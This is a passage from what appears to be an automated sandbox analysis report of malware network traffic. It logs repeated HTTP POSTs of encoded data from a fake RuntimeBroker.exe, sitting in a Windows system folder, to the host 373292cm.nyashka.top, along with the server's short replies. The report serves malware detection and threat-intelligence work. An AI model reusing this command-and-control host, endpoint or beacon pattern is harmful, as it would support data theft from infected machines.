                                                                                  Data Ascii: _P\PQBT\[_ZQY^XWW]]YWXS[\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.;0$"'70)>.7<.6)=8#<#1?'7 \;>&F$.Y/
                                                                                  Jan 11, 2025 06:43:50.853636980 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:50.984355927 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:50 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  40192.168.2.65707437.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:51.219702959 CET257OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Jan 11, 2025 06:43:51.567353964 CET2544OUTData Raw: 5f 52 5c 5f 54 43 51 5e 5b 5f 5a 51 59 50 58 53 57 51 5d 53 57 5b 53 5f 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _R\_TCQ^[_ZQYPXSWQ]SW[S_\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S., $!0^73=Y)\>==+'47R70P(_$"3!;&F$.Y/
                                                                                  Jan 11, 2025 06:43:51.855947971 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:51.988027096 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:51 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  41192.168.2.65707537.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:52.121082067 CET257OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Jan 11, 2025 06:43:52.473582029 CET2544OUTData Raw: 5a 57 5c 53 54 49 54 58 5b 5f 5a 51 59 55 58 57 57 5f 5d 5d 57 5f 53 5b 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZW\STITX[_ZQYUXWW_]]W_S[\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.\,#". #0)==4_<"+>#\4<W7<??]#%..&F$.Y/-
                                                                                  Jan 11, 2025 06:43:52.753743887 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:52.882991076 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:52 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  42192.168.2.65707637.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:53.010160923 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:53.364036083 CET2544OUTData Raw: 5f 5c 59 50 54 45 54 5c 5b 5f 5a 51 59 5e 58 53 57 50 5d 58 57 5d 53 5b 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _\YPTET\[_ZQY^XSWP]XW]S[\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.;0 !=8# =[=<<:)-+",0#W'*:$43:,>&F$.Y/
                                                                                  Jan 11, 2025 06:43:53.639132977 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:53.766424894 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:53 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  43192.168.2.65707737.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:53.930180073 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:54.285871983 CET2544OUTData Raw: 5f 55 59 57 54 45 54 5a 5b 5f 5a 51 59 51 58 55 57 5e 5d 5e 57 51 53 5a 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _UYWTETZ[_ZQYQXUW^]^WQSZ\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.^;#0"0]#5).<<>+[(7#R ?<\#0*;&F$.Y/=
                                                                                  Jan 11, 2025 06:43:54.585397959 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:54.719871044 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:54 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  44192.168.2.65707837.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:54.854634047 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:55.207762957 CET2544OUTData Raw: 5f 53 5c 54 51 47 51 5e 5b 5f 5a 51 59 55 58 56 57 5c 5d 52 57 5b 53 59 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _S\TQGQ^[_ZQYUXVW\]RW[SY\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-; 867X)+?])- ?3P 1 <_7^4=/.&F$.Y/-
                                                                                  Jan 11, 2025 06:43:55.493876934 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:55.660264969 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:55 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  45192.168.2.65707937.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:55.787805080 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:56.146410942 CET2544OUTData Raw: 5f 50 5c 55 51 45 51 5e 5b 5f 5a 51 59 50 58 57 57 51 5d 52 57 5f 53 5f 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _P\UQEQ^[_ZQYPXWWQ]RW_S_\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.Y8'53#Y=[(X<>).;4 S<(40)X,&F$.Y/
                                                                                  Jan 11, 2025 06:43:56.415776968 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:56.546447992 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:56 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  46192.168.2.65708037.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:55.854919910 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 1872
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:56.208977938 CET1872OUTData Raw: 5f 51 59 55 51 45 54 50 5b 5f 5a 51 59 51 58 56 57 58 5d 5f 57 50 53 55 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _QYUQETP[_ZQYQXVWX]_WPSU\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-/@#-##3=*(X>=9+-;7??V#!0V<:?\#0_8>&F$.Y/=
                                                                                  Jan 11, 2025 06:43:56.491699934 CET25INHTTP/1.1 100 Continue


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  47192.168.2.65708137.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:56.807445049 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:57.160871983 CET2544OUTData Raw: 5f 5c 5c 57 54 47 54 5a 5b 5f 5a 51 59 50 58 50 57 5b 5d 5e 57 51 53 58 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _\\WTGTZ[_ZQYPXPW[]^WQSX\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-.#$6<Y40)>3+.!(=#Z<4'('4)Y.>&F$.Y/
                                                                                  Jan 11, 2025 06:43:57.453675032 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:57.623456001 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:57 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  48192.168.2.65708337.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:57.758203030 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:58.114073992 CET2544OUTData Raw: 5f 5d 59 52 51 42 51 5c 5b 5f 5a 51 59 53 58 52 57 5c 5d 58 57 5b 53 54 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _]YRQBQ\[_ZQYSXRW\]XW[ST\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.]/3!'4X).?<>>)- /V71(*7X#01X/>&F$.Y/5
                                                                                  Jan 11, 2025 06:43:58.409961939 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:58.575423002 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:58 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  49192.168.2.65708437.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:58.695322037 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:43:59.051956892 CET2536OUTData Raw: 5f 50 5c 50 51 47 54 51 5b 5f 5a 51 59 57 58 5e 57 50 5d 5e 57 58 53 5e 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _P\PQGTQ[_ZQYWX^WP]^WXS^\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-,#"-4#3=[)[(\<[?=#,$ 3?8 8&F$.Y/
                                                                                  Jan 11, 2025 06:43:59.444792986 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:43:59.597199917 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:43:59 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  50192.168.2.65708537.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:43:59.726896048 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:00.082865000 CET2536OUTData Raw: 5f 52 5c 54 54 46 54 5b 5b 5f 5a 51 59 57 58 5e 57 5a 5d 52 57 59 53 5d 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _R\TTFT[[_ZQYWX^WZ]RWYS]\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-/3#A!='72=[3(=*)='7<!"?(9? 3!X/&F$.Y/
                                                                                  Jan 11, 2025 06:44:00.356128931 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:00.486640930 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:00 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  51192.168.2.65708637.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:00.618572950 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:00.973392010 CET2544OUTData Raw: 5a 51 5c 57 51 42 54 5a 5b 5f 5a 51 59 5f 58 56 57 5b 5d 5c 57 5f 53 5a 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZQ\WQBTZ[_ZQY_XVW[]\W_SZ\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.],U;A"+4V9\>?+-(= ,/R42$R++_70)];.&F$.Y/
                                                                                  Jan 11, 2025 06:44:01.247380018 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:01.374439001 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:01 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  52192.168.2.65708737.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:01.514717102 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  53192.168.2.65708837.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:01.640928030 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 1852
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:02.032799959 CET1852OUTData Raw: 5a 56 5c 54 51 43 54 5f 5b 5f 5a 51 59 5f 58 52 57 5f 5d 5a 57 58 53 58 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZV\TQCT_[_ZQY_XRW_]ZWXSX\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.X;/C6>?73!Z=\<-9^(>$#<#R423*)77#=X;>&F$.Y/
                                                                                  Jan 11, 2025 06:44:02.297188997 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:02.431929111 CET308INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:02 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 09 1d 25 0d 3d 25 2d 00 32 02 3c 1b 24 1d 2a 54 2b 3e 38 03 3d 13 22 00 24 28 2d 1a 31 07 3b 0f 24 15 07 5c 3c 2e 29 0e 32 11 30 01 2c 24 2b 5d 0c 13 21 07 20 29 32 5a 26 5a 2c 10 29 2b 2b 5c 35 3c 3e 59 29 39 36 0a 3f 2f 20 5b 3c 29 0d 59 3c 3a 31 0c 2f 28 21 5f 2d 20 2d 09 20 04 2b 52 0d 11 24 52 2b 03 31 53 29 2e 2b 59 36 2b 3f 13 30 5b 2e 1d 25 22 32 54 30 3a 3f 02 31 1c 17 1d 25 21 07 51 32 5d 31 01 27 2c 25 12 22 22 23 54 2c 00 22 57 01 33 55 56
                                                                                  Data Ascii: %=%-2<$*T+>8="$(-1;$\<.)20,$+]! )2Z&Z,)++\5<>Y)96?/ [<)Y<:1/(!_- - +R$R+1S).+Y6+?0[.%"2T0:?1%!Q2]1',%""#T,"W3UV


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  54192.168.2.65708937.44.238.250806008C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Jan 11, 2025 06:44:01.947981119 CET281OUTPOST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
